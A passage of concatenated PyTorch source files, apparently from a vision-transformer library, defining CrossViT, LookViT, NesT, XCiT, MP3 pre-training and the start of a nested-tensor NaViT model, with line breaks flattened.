/ value 
qkv = (self.to_q(x), *self.to_kv(context).chunk(2, dim = -1)) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv) dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) # transformer encoder, for small and large patches class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) self.norm = nn.LayerNorm(dim) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) # projecting CLS tokens, in the case that small and large patch tokens have different dimensions class ProjectInOut(nn.Module): def __init__(self, dim_in, dim_out, fn): super().__init__() self.fn = fn need_projection = dim_in != dim_out self.project_in = nn.Linear(dim_in, dim_out) if need_projection else nn.Identity() self.project_out = nn.Linear(dim_out, dim_in) if need_projection else nn.Identity() def forward(self, x, *args, **kwargs): x = self.project_in(x) x = self.fn(x, *args, **kwargs) x = self.project_out(x) return x # cross attention transformer class CrossTransformer(nn.Module): def __init__(self, sm_dim, lg_dim, depth, heads, dim_head, dropout): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ ProjectInOut(sm_dim, lg_dim, Attention(lg_dim, heads = heads, dim_head = dim_head, dropout = dropout)), ProjectInOut(lg_dim, sm_dim, Attention(sm_dim, heads = heads, dim_head = dim_head, dropout = dropout)) ])) def forward(self, sm_tokens, lg_tokens): (sm_cls, sm_patch_tokens), (lg_cls, lg_patch_tokens) = map(lambda t: (t[:, :1], t[:, 1:]), (sm_tokens, lg_tokens)) for sm_attend_lg, lg_attend_sm in self.layers: sm_cls = sm_attend_lg(sm_cls, context = lg_patch_tokens, kv_include_self = True) + sm_cls lg_cls = lg_attend_sm(lg_cls, context = sm_patch_tokens, kv_include_self = True) + lg_cls sm_tokens = torch.cat((sm_cls, sm_patch_tokens), dim = 1) lg_tokens = torch.cat((lg_cls, lg_patch_tokens), dim = 1) return sm_tokens, lg_tokens # multi-scale encoder class MultiScaleEncoder(nn.Module): def __init__( self, *, depth, sm_dim, lg_dim, sm_enc_params, lg_enc_params, cross_attn_heads, cross_attn_depth, cross_attn_dim_head = 64, dropout = 0. ): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Transformer(dim = sm_dim, dropout = dropout, **sm_enc_params), Transformer(dim = lg_dim, dropout = dropout, **lg_enc_params), CrossTransformer(sm_dim = sm_dim, lg_dim = lg_dim, depth = cross_attn_depth, heads = cross_attn_heads, dim_head = cross_attn_dim_head, dropout = dropout) ])) def forward(self, sm_tokens, lg_tokens): for sm_enc, lg_enc, cross_attend in self.layers: sm_tokens, lg_tokens = sm_enc(sm_tokens), lg_enc(lg_tokens) sm_tokens, lg_tokens = cross_attend(sm_tokens, lg_tokens) return sm_tokens, lg_tokens # patch-based image to token embedder class ImageEmbedder(nn.Module): def __init__( self, *, dim, image_size, patch_size, dropout = 0., channels = 3 ): super().__init__() assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.' 
num_patches = (image_size // patch_size) ** 2 patch_dim = channels * patch_size ** 2 self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_size, p2 = patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim) ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(dropout) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :(n + 1)] return self.dropout(x) # cross ViT class class CrossViT(nn.Module): def __init__( self, *, image_size, num_classes, sm_dim, lg_dim, sm_patch_size = 12, sm_enc_depth = 1, sm_enc_heads = 8, sm_enc_mlp_dim = 2048, sm_enc_dim_head = 64, lg_patch_size = 16, lg_enc_depth = 4, lg_enc_heads = 8, lg_enc_mlp_dim = 2048, lg_enc_dim_head = 64, cross_attn_depth = 2, cross_attn_heads = 8, cross_attn_dim_head = 64, depth = 3, dropout = 0.1, emb_dropout = 0.1, channels = 3 ): super().__init__() self.sm_image_embedder = ImageEmbedder(dim = sm_dim, channels= channels, image_size = image_size, patch_size = sm_patch_size, dropout = emb_dropout) self.lg_image_embedder = ImageEmbedder(dim = lg_dim, channels = channels, image_size = image_size, patch_size = lg_patch_size, dropout = emb_dropout) self.multi_scale_encoder = MultiScaleEncoder( depth = depth, sm_dim = sm_dim, lg_dim = lg_dim, cross_attn_heads = cross_attn_heads, cross_attn_dim_head = cross_attn_dim_head, cross_attn_depth = cross_attn_depth, sm_enc_params = dict( depth = sm_enc_depth, heads = sm_enc_heads, mlp_dim = sm_enc_mlp_dim, dim_head = sm_enc_dim_head ), lg_enc_params = dict( depth = lg_enc_depth, heads = lg_enc_heads, mlp_dim = lg_enc_mlp_dim, dim_head = lg_enc_dim_head ), dropout = dropout ) self.sm_mlp_head = nn.Sequential(nn.LayerNorm(sm_dim), nn.Linear(sm_dim, num_classes)) self.lg_mlp_head = nn.Sequential(nn.LayerNorm(lg_dim), nn.Linear(lg_dim, num_classes)) def forward(self, img): sm_tokens = self.sm_image_embedder(img) lg_tokens = self.lg_image_embedder(img) sm_tokens, lg_tokens = self.multi_scale_encoder(sm_tokens, lg_tokens) sm_cls, lg_cls = map(lambda t: t[:, 0], (sm_tokens, lg_tokens)) sm_logits = self.sm_mlp_head(sm_cls) lg_logits = self.lg_mlp_head(lg_cls) return sm_logits + lg_logits File: vit_pytorch/look_vit.py import torch from torch import nn import torch.nn.functional as F from torch.nn import Module, ModuleList from einops import einsum, rearrange, repeat, reduce from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def divisible_by(num, den): return (num % den) == 0 # simple vit sinusoidal pos emb def posemb_sincos_2d(t, temperature = 10000): h, w, d, device = *t.shape[1:], t.device y, x = torch.meshgrid(torch.arange(h, device = device), torch.arange(w, device = device), indexing = 'ij') assert (d % 4) == 0, "feature dimension must be multiple of 4 for sincos emb" omega = torch.arange(d // 4, device = device) / (d // 4 - 1) omega = temperature ** -omega y = y.flatten()[:, None] * omega[None, :] x = x.flatten()[:, None] * omega[None, :] pos = torch.cat((x.sin(), x.cos(), y.sin(), y.cos()), dim = 1) return pos.float() # bias-less layernorm with unit offset trick (discovered by Ohad Rubin) class LayerNorm(Module): def __init__(self, dim): super().__init__() self.ln = nn.LayerNorm(dim, 
elementwise_affine = False) self.gamma = nn.Parameter(torch.zeros(dim)) def forward(self, x): normed = self.ln(x) return normed * (self.gamma + 1) # mlp def MLP(dim, factor = 4, dropout = 0.): hidden_dim = int(dim * factor) return nn.Sequential( LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) # attention class Attention(Module): def __init__( self, dim, heads = 8, dim_head = 64, dropout = 0., cross_attend = False, reuse_attention = False ): super().__init__() inner_dim = dim_head * heads self.scale = dim_head ** -0.5 self.heads = heads self.reuse_attention = reuse_attention self.cross_attend = cross_attend self.split_heads = Rearrange('b n (h d) -> b h n d', h = heads) self.norm = LayerNorm(dim) if not reuse_attention else nn.Identity() self.norm_context = LayerNorm(dim) if cross_attend else nn.Identity() self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_q = nn.Linear(dim, inner_dim, bias = False) if not reuse_attention else None self.to_k = nn.Linear(dim, inner_dim, bias = False) if not reuse_attention else None self.to_v = nn.Linear(dim, inner_dim, bias = False) self.to_out = nn.Sequential( Rearrange('b h n d -> b n (h d)'), nn.Linear(inner_dim, dim, bias = False), nn.Dropout(dropout) ) def forward( self, x, context = None, return_qk_sim = False, qk_sim = None ): x = self.norm(x) assert not (exists(context) ^ self.cross_attend) if self.cross_attend: context = self.norm_context(context) else: context = x v = self.to_v(context) v = self.split_heads(v) if not self.reuse_attention: qk = (self.to_q(x), self.to_k(context)) q, k = tuple(self.split_heads(t) for t in qk) q = q * self.scale qk_sim = einsum(q, k, 'b h i d, b h j d -> b h i j') else: assert exists(qk_sim), 'qk sim matrix must be passed in for reusing previous attention' attn = self.attend(qk_sim) attn = self.dropout(attn) out = einsum(attn, v, 'b h i j, b h j d -> b h i d') out = self.to_out(out) if not return_qk_sim: return out return out, qk_sim # LookViT class LookViT(Module): def __init__( self, *, dim, image_size, num_classes, depth = 3, patch_size = 16, heads = 8, mlp_factor = 4, dim_head = 64, highres_patch_size = 12, highres_mlp_factor = 4, cross_attn_heads = 8, cross_attn_dim_head = 64, patch_conv_kernel_size = 7, dropout = 0.1, channels = 3 ): super().__init__() assert divisible_by(image_size, highres_patch_size) assert divisible_by(image_size, patch_size) assert patch_size > highres_patch_size, 'patch size of the main vision transformer should be smaller than the highres patch sizes (that does the `lookup`)' assert not divisible_by(patch_conv_kernel_size, 2) self.dim = dim self.image_size = image_size self.patch_size = patch_size kernel_size = patch_conv_kernel_size patch_dim = (highres_patch_size * highres_patch_size) * channels self.to_patches = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (p1 p2 c) h w', p1 = highres_patch_size, p2 = highres_patch_size), nn.Conv2d(patch_dim, dim, kernel_size, padding = kernel_size // 2), Rearrange('b c h w -> b h w c'), LayerNorm(dim), ) # absolute positions num_patches = (image_size // highres_patch_size) ** 2 self.pos_embedding = nn.Parameter(torch.randn(num_patches, dim)) # lookvit blocks layers = ModuleList([]) for _ in range(depth): layers.append(ModuleList([ Attention(dim = dim, dim_head = dim_head, heads = heads, dropout = dropout), MLP(dim = dim, factor = mlp_factor, dropout = dropout), Attention(dim = dim, dim_head = cross_attn_dim_head, heads = cross_attn_heads, 
dropout = dropout, cross_attend = True), Attention(dim = dim, dim_head = cross_attn_dim_head, heads = cross_attn_heads, dropout = dropout, cross_attend = True, reuse_attention = True), LayerNorm(dim), MLP(dim = dim, factor = highres_mlp_factor, dropout = dropout) ])) self.layers = layers self.norm = LayerNorm(dim) self.highres_norm = LayerNorm(dim) self.to_logits = nn.Linear(dim, num_classes, bias = False) def forward(self, img): assert img.shape[-2:] == (self.image_size, self.image_size) # to patch tokens and positions highres_tokens = self.to_patches(img) size = highres_tokens.shape[-2] pos_emb = posemb_sincos_2d(highres_tokens) highres_tokens = highres_tokens + rearrange(pos_emb, '(h w) d -> h w d', h = size) tokens = F.interpolate( rearrange(highres_tokens, 'b h w d -> b d h w'), img.shape[-1] // self.patch_size, mode = 'bilinear' ) tokens = rearrange(tokens, 'b c h w -> b (h w) c') highres_tokens = rearrange(highres_tokens, 'b h w c -> b (h w) c') # attention and feedforwards for attn, mlp, lookup_cross_attn, highres_attn, highres_norm, highres_mlp in self.layers: # main tokens cross attends (lookup) on the high res tokens lookup_out, qk_sim = lookup_cross_attn(tokens, highres_tokens, return_qk_sim = True) # return attention as they reuse the attention matrix tokens = lookup_out + tokens tokens = attn(tokens) + tokens tokens = mlp(tokens) + tokens # attention-reuse qk_sim = rearrange(qk_sim, 'b h i j -> b h j i') # transpose for reverse cross attention highres_tokens = highres_attn(highres_tokens, tokens, qk_sim = qk_sim) + highres_tokens highres_tokens = highres_norm(highres_tokens) highres_tokens = highres_mlp(highres_tokens) + highres_tokens # to logits tokens = self.norm(tokens) highres_tokens = self.highres_norm(highres_tokens) tokens = reduce(tokens, 'b n d -> b d', 'mean') highres_tokens = reduce(highres_tokens, 'b n d -> b d', 'mean') return self.to_logits(tokens + highres_tokens) # main if __name__ == '__main__': v = LookViT( image_size = 256, num_classes = 1000, dim = 512, depth = 2, heads = 8, dim_head = 64, patch_size = 32, highres_patch_size = 8, highres_mlp_factor = 2, cross_attn_heads = 8, cross_attn_dim_head = 64, dropout = 0.1 ).cuda() img = torch.randn(2, 3, 256, 256).cuda() pred = v(img) assert pred.shape == (2, 1000) File: vit_pytorch/nest.py from functools import partial import torch from torch import nn, einsum from einops import rearrange from einops.layers.torch import Rearrange, Reduce # helpers def cast_tuple(val, depth): return val if isinstance(val, tuple) else ((val,) * depth) # classes class LayerNorm(nn.Module): def __init__(self, dim, eps = 1e-5): super().__init__() self.eps = eps self.g = nn.Parameter(torch.ones(1, dim, 1, 1)) self.b = nn.Parameter(torch.zeros(1, dim, 1, 1)) def forward(self, x): var = torch.var(x, dim = 1, unbiased = False, keepdim = True) mean = torch.mean(x, dim = 1, keepdim = True) return (x - mean) / (var + self.eps).sqrt() * self.g + self.b class FeedForward(nn.Module): def __init__(self, dim, mlp_mult = 4, dropout = 0.): super().__init__() self.net = nn.Sequential( LayerNorm(dim), nn.Conv2d(dim, dim * mlp_mult, 1), nn.GELU(), nn.Dropout(dropout), nn.Conv2d(dim * mlp_mult, dim, 1), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dropout = 0.): super().__init__() dim_head = dim // heads inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = 
nn.Dropout(dropout) self.to_qkv = nn.Conv2d(dim, inner_dim * 3, 1, bias = False) self.to_out = nn.Sequential( nn.Conv2d(inner_dim, dim, 1), nn.Dropout(dropout) ) def forward(self, x): b, c, h, w, heads = *x.shape, self.heads x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = 1) q, k, v = map(lambda t: rearrange(t, 'b (h d) x y -> b h (x y) d', h = heads), qkv) dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h (x y) d -> b (h d) x y', x = h, y = w) return self.to_out(out) def Aggregate(dim, dim_out): return nn.Sequential( nn.Conv2d(dim, dim_out, 3, padding = 1), LayerNorm(dim_out), nn.MaxPool2d(3, stride = 2, padding = 1) ) class Transformer(nn.Module): def __init__(self, dim, seq_len, depth, heads, mlp_mult, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) self.pos_emb = nn.Parameter(torch.randn(seq_len)) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dropout = dropout), FeedForward(dim, mlp_mult, dropout = dropout) ])) def forward(self, x): *_, h, w = x.shape pos_emb = self.pos_emb[:(h * w)] pos_emb = rearrange(pos_emb, '(h w) -> () () h w', h = h, w = w) x = x + pos_emb for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x class NesT(nn.Module): def __init__( self, *, image_size, patch_size, num_classes, dim, heads, num_hierarchies, block_repeats, mlp_mult = 4, channels = 3, dim_head = 64, dropout = 0. ): super().__init__() assert (image_size % patch_size) == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_size // patch_size) ** 2 patch_dim = channels * patch_size ** 2 fmap_size = image_size // patch_size blocks = 2 ** (num_hierarchies - 1) seq_len = (fmap_size // blocks) ** 2 # sequence length is held constant across hierarchy hierarchies = list(reversed(range(num_hierarchies))) mults = [2 ** i for i in reversed(hierarchies)] layer_heads = list(map(lambda t: t * heads, mults)) layer_dims = list(map(lambda t: t * dim, mults)) last_dim = layer_dims[-1] layer_dims = [*layer_dims, layer_dims[-1]] dim_pairs = zip(layer_dims[:-1], layer_dims[1:]) self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (p1 p2 c) h w', p1 = patch_size, p2 = patch_size), LayerNorm(patch_dim), nn.Conv2d(patch_dim, layer_dims[0], 1), LayerNorm(layer_dims[0]) ) block_repeats = cast_tuple(block_repeats, num_hierarchies) self.layers = nn.ModuleList([]) for level, heads, (dim_in, dim_out), block_repeat in zip(hierarchies, layer_heads, dim_pairs, block_repeats): is_last = level == 0 depth = block_repeat self.layers.append(nn.ModuleList([ Transformer(dim_in, seq_len, depth, heads, mlp_mult, dropout), Aggregate(dim_in, dim_out) if not is_last else nn.Identity() ])) self.mlp_head = nn.Sequential( LayerNorm(last_dim), Reduce('b c h w -> b c', 'mean'), nn.Linear(last_dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) b, c, h, w = x.shape num_hierarchies = len(self.layers) for level, (transformer, aggregate) in zip(reversed(range(num_hierarchies)), self.layers): block_size = 2 ** level x = rearrange(x, 'b c (b1 h) (b2 w) -> (b b1 b2) c h w', b1 = block_size, b2 = block_size) x = transformer(x) x = rearrange(x, '(b b1 b2) c h w -> b c (b1 h) (b2 w)', b1 = block_size, b2 = block_size) x = aggregate(x) return self.mlp_head(x) File: vit_pytorch/xcit.py from random import randrange import torch from torch import nn, einsum from torch.nn 
import Module, ModuleList import torch.nn.functional as F from einops import rearrange, repeat, pack, unpack from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def pack_one(t, pattern): return pack([t], pattern) def unpack_one(t, ps, pattern): return unpack(t, ps, pattern)[0] def l2norm(t): return F.normalize(t, dim = -1, p = 2) def dropout_layers(layers, dropout): if dropout == 0: return layers num_layers = len(layers) to_drop = torch.zeros(num_layers).uniform_(0., 1.) < dropout # make sure at least one layer makes it if all(to_drop): rand_index = randrange(num_layers) to_drop[rand_index] = False layers = [layer for (layer, drop) in zip(layers, to_drop) if not drop] return layers # classes class LayerScale(Module): def __init__(self, dim, fn, depth): super().__init__() if depth <= 18: init_eps = 0.1 elif 18 > depth <= 24: init_eps = 1e-5 else: init_eps = 1e-6 self.fn = fn self.scale = nn.Parameter(torch.full((dim,), init_eps)) def forward(self, x, **kwargs): return self.fn(x, **kwargs) * self.scale class FeedForward(Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.to_q = nn.Linear(dim, inner_dim, bias = False) self.to_kv = nn.Linear(dim, inner_dim * 2, bias = False) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x, context = None): h = self.heads x = self.norm(x) context = x if not exists(context) else torch.cat((x, context), dim = 1) qkv = (self.to_q(x), *self.to_kv(context).chunk(2, dim = -1)) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv) sim = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale attn = self.attend(sim) attn = self.dropout(attn) out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class XCAttention(Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.norm = nn.LayerNorm(dim) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.temperature = nn.Parameter(torch.ones(heads, 1, 1)) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x): h = self.heads x, ps = pack_one(x, 'b * d') x = self.norm(x) q, k, v = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h d n', h = h), (q, k, v)) q, k = map(l2norm, (q, k)) sim = einsum('b h i n, b h j n -> b h i j', q, k) * self.temperature.exp() attn = self.attend(sim) attn = self.dropout(attn) out = einsum('b h i j, b h j n -> b h i n', attn, v) out = rearrange(out, 'b h d n -> b n (h d)') out = unpack_one(out, ps, 'b * d') return self.to_out(out) class LocalPatchInteraction(Module): def __init__(self, dim, kernel_size = 3): super().__init__() assert (kernel_size % 2) == 1 padding = kernel_size // 2 self.net = nn.Sequential( nn.LayerNorm(dim), Rearrange('b h w c -> b c h w'), nn.Conv2d(dim, 
dim, kernel_size, padding = padding, groups = dim), nn.BatchNorm2d(dim), nn.GELU(), nn.Conv2d(dim, dim, kernel_size, padding = padding, groups = dim), Rearrange('b c h w -> b h w c'), ) def forward(self, x): return self.net(x) class Transformer(Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0., layer_dropout = 0.): super().__init__() self.layers = ModuleList([]) self.layer_dropout = layer_dropout for ind in range(depth): layer = ind + 1 self.layers.append(ModuleList([ LayerScale(dim, Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), depth = layer), LayerScale(dim, FeedForward(dim, mlp_dim, dropout = dropout), depth = layer) ])) def forward(self, x, context = None): layers = dropout_layers(self.layers, dropout = self.layer_dropout) for attn, ff in layers: x = attn(x, context = context) + x x = ff(x) + x return x class XCATransformer(Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, local_patch_kernel_size = 3, dropout = 0., layer_dropout = 0.): super().__init__() self.layers = ModuleList([]) self.layer_dropout = layer_dropout for ind in range(depth): layer = ind + 1 self.layers.append(ModuleList([ LayerScale(dim, XCAttention(dim, heads = heads, dim_head = dim_head, dropout = dropout), depth = layer), LayerScale(dim, LocalPatchInteraction(dim, local_patch_kernel_size), depth = layer), LayerScale(dim, FeedForward(dim, mlp_dim, dropout = dropout), depth = layer) ])) def forward(self, x): layers = dropout_layers(self.layers, dropout = self.layer_dropout) for cross_covariance_attn, local_patch_interaction, ff in layers: x = cross_covariance_attn(x) + x x = local_patch_interaction(x) + x x = ff(x) + x return x class XCiT(Module): def __init__( self, *, image_size, patch_size, num_classes, dim, depth, cls_depth, heads, mlp_dim, dim_head = 64, dropout = 0., emb_dropout = 0., local_patch_kernel_size = 3, layer_dropout = 0. ): super().__init__() assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_size // patch_size) ** 2 patch_dim = 3 * patch_size ** 2 self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b h w (p1 p2 c)', p1 = patch_size, p2 = patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim) ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches, dim)) self.cls_token = nn.Parameter(torch.randn(dim)) self.dropout = nn.Dropout(emb_dropout) self.xcit_transformer = XCATransformer(dim, depth, heads, dim_head, mlp_dim, local_patch_kernel_size, dropout, layer_dropout) self.final_norm = nn.LayerNorm(dim) self.cls_transformer = Transformer(dim, cls_depth, heads, dim_head, mlp_dim, dropout, layer_dropout) self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) x, ps = pack_one(x, 'b * d') b, n, _ = x.shape x += self.pos_embedding[:, :n] x = unpack_one(x, ps, 'b * d') x = self.dropout(x) x = self.xcit_transformer(x) x = self.final_norm(x) cls_tokens = repeat(self.cls_token, 'd -> b 1 d', b = b) x = rearrange(x, 'b ... d -> b (...) 
d') cls_tokens = self.cls_transformer(cls_tokens, context = x) return self.mlp_head(cls_tokens[:, 0]) File: vit_pytorch/mp3.py import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def pair(t): return t if isinstance(t, tuple) else (t, t) # positional embedding def posemb_sincos_2d(patches, temperature = 10000, dtype = torch.float32): _, h, w, dim, device, dtype = *patches.shape, patches.device, patches.dtype y, x = torch.meshgrid(torch.arange(h, device = device), torch.arange(w, device = device), indexing = 'ij') assert (dim % 4) == 0, 'feature dimension must be multiple of 4 for sincos emb' omega = torch.arange(dim // 4, device = device) / (dim // 4 - 1) omega = 1. / (temperature ** omega) y = y.flatten()[:, None] * omega[None, :] x = x.flatten()[:, None] * omega[None, :] pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos()), dim = 1) return pe.type(dtype) # feedforward class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) # (cross)attention class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.norm = nn.LayerNorm(dim) self.to_q = nn.Linear(dim, inner_dim, bias = False) self.to_kv = nn.Linear(dim, inner_dim * 2, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x, context = None): b, n, _, h = *x.shape, self.heads x = self.norm(x) context = self.norm(context) if exists(context) else x qkv = (self.to_q(x), *self.to_kv(context).chunk(2, dim = -1)) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv) dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x, context = None): for attn, ff in self.layers: x = attn(x, context = context) + x x = ff(x) + x return x class ViT(nn.Module): def __init__(self, *, num_classes, image_size, patch_size, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64, dropout = 0.): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' 
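        # shape sketch (illustrative numbers, not from the source): a 224 x 224 RGB image with 16 x 16 patches
        # yields (224 // 16) * (224 // 16) = 196 tokens below, each a flattened patch of
        # patch_dim = 3 * 16 * 16 = 768 values before the Linear projection to `dim`; the fixed 2d sincos
        # positional embedding defined above is added later, inside forward()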
num_patches = (image_height // patch_height) * (image_width // patch_width) patch_dim = channels * patch_height * patch_width self.dim = dim self.num_patches = num_patches self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b h w (p1 p2 c)', p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) self.to_latent = nn.Identity() self.linear_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): *_, h, w, dtype = *img.shape, img.dtype x = self.to_patch_embedding(img) pe = posemb_sincos_2d(x) x = rearrange(x, 'b ... d -> b (...) d') + pe x = self.transformer(x) x = x.mean(dim = 1) x = self.to_latent(x) return self.linear_head(x) # Masked Position Prediction Pre-Training class MP3(nn.Module): def __init__(self, vit: ViT, masking_ratio): super().__init__() self.vit = vit assert masking_ratio > 0 and masking_ratio < 1, 'masking ratio must be kept between 0 and 1' self.masking_ratio = masking_ratio dim = vit.dim self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, vit.num_patches) ) def forward(self, img): device = img.device tokens = self.vit.to_patch_embedding(img) tokens = rearrange(tokens, 'b ... d -> b (...) d') batch, num_patches, *_ = tokens.shape # Masking num_masked = int(self.masking_ratio * num_patches) rand_indices = torch.rand(batch, num_patches, device = device).argsort(dim = -1) masked_indices, unmasked_indices = rand_indices[:, :num_masked], rand_indices[:, num_masked:] batch_range = torch.arange(batch, device = device)[:, None] tokens_unmasked = tokens[batch_range, unmasked_indices] attended_tokens = self.vit.transformer(tokens, tokens_unmasked) logits = rearrange(self.mlp_head(attended_tokens), 'b n d -> (b n) d') # Define labels labels = repeat(torch.arange(num_patches, device = device), 'n -> (b n)', b = batch) loss = F.cross_entropy(logits, labels) return loss File: vit_pytorch/na_vit_nested_tensor_3d.py from __future__ import annotations from typing import List from functools import partial import torch import packaging.version as pkg_version if pkg_version.parse(torch.__version__) < pkg_version.parse('2.4'): print('nested tensor NaViT was tested on pytorch 2.4') from torch import nn, Tensor import torch.nn.functional as F from torch.nn import Module, ModuleList from torch.nested import nested_tensor from einops import rearrange from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def pair(t): return t if isinstance(t, tuple) else (t, t) def divisible_by(numer, denom): return (numer % denom) == 0 # feedforward def FeedForward(dim, hidden_dim, dropout = 0.): return nn.Sequential( nn.LayerNorm(dim, bias = False), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) class Attention(Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() self.norm = nn.LayerNorm(dim, bias = False) dim_inner = heads * dim_head self.heads = heads self.dim_head = dim_head self.to_queries = nn.Linear(dim, dim_inner, bias = False) self.to_keys = nn.Linear(dim, dim_inner, bias = False) self.to_values = nn.Linear(dim, dim_inner, bias = False) # in the paper, they employ qk rmsnorm, a way to stabilize attention # will use layernorm in place of rmsnorm, which has been shown 